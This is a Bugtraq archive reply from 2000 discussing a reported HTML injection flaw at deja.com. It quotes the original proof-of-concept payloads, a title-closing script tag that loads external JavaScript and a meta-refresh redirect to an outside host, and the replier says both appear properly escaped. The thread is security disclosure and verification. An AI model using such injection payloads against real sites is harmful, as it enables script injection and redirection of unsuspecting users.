Bugtraq mailing list archives
Re: Malicious-HTML vulnerabilities at deja.com
From: geert () UTTNARAG TN UTWENTE NL (Geert Altena)
Date: Fri, 17 Mar 2000 12:31:46 +0100
You, Niall Smart, <niall () POBOX COM>, wrote:
deja.com does not always escape meta-characters when displaying
^^^^^^^^^^
Usenet articles. Specifically, the article view page (http://www.deja.com/getdoc.xp) and the thread view page (http://www.deja.com/viewthread.xp) display the subject of the article "as is" between title tags. Examples ======== JavaScript popup: http://www.deja.com/getdoc.xp?AN=591804116
Comes out as (copy/paste from netscape): ------------
Forum: alt.test Thread: </title><script src="http://www.in-design.com/~nsmart/foo.js"></script><body onLoad="return bar()"> Message 1 of 1
Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js"> </script><body onLoad="return bar()"> Date: 03/01/2000 Author: regkey <regkey () yahoo com> -------------- I have javascript enabled, no popup.
Redirection using meta tag: http://www.deja.com/getdoc.xp?AN=591833344
Comes out as: -----------------
Forum: alt.test Thread: </title><meta http-equiv="refresh"
content="0;url=http://www.in-design.com/~nsmart/deja.html">
Message 1 of 1
Subject: </title><meta http-equiv="refresh" content="0;url=http://www.in-design.com/~nsmart/deja.html"> Date: 03/01/2000 Author: regkey <regkey () yahoo com> -------------------- No redirection here to www.in-design.com. Looking at the source, in both cases (javascript and meta rerefresh) the "<" and ">" are properly replaced by "<" and ">" eliminating the vulnerabilities you mentioned. Same thing applies then I get the article via powersearch. So either someone at Deja reads Bugtraq and did a fix before this reply or this is a case where things _are_ properly escaped. Cheers, \Geert. -- Geert Altena | Geert () uttnarag tn utwente nl | Coffee, black, no sugar Finger for PGPkey : Diffie-Hellman 2048/0xC540C550 Prediction is difficult, especially of the future. - (Niels Bohr)
Current thread:
- FW: [NTBUGTRAQ] AT Jobs - Denial of serice/Privilege Elevation DeAvillez, Carlos (Mar 14)
- Malicious-HTML vulnerabilities at deja.com Niall Smart (Mar 15)
- Re: Malicious-HTML vulnerabilities at deja.com Geert Altena (Mar 17)
- Re: FW: [NTBUGTRAQ] AT Jobs - Denial of serice/Privilege Elevation Andy Caus (Mar 16)
- Re: FW: [NTBUGTRAQ] AT Jobs - Denial of serice/Privilege Elevation Daniel Harter (Mar 17)
- OfficeScan TrendMicro: admin for everybody ! Gregory Duchemin (Mar 16)
- Analysis of the Shaft distributed denial of service tool Sven Dietrich (Mar 16)
- Re: Analysis of the Shaft distributed denial of service tool Max Vision (Mar 17)
- Malicious-HTML vulnerabilities at deja.com Niall Smart (Mar 15)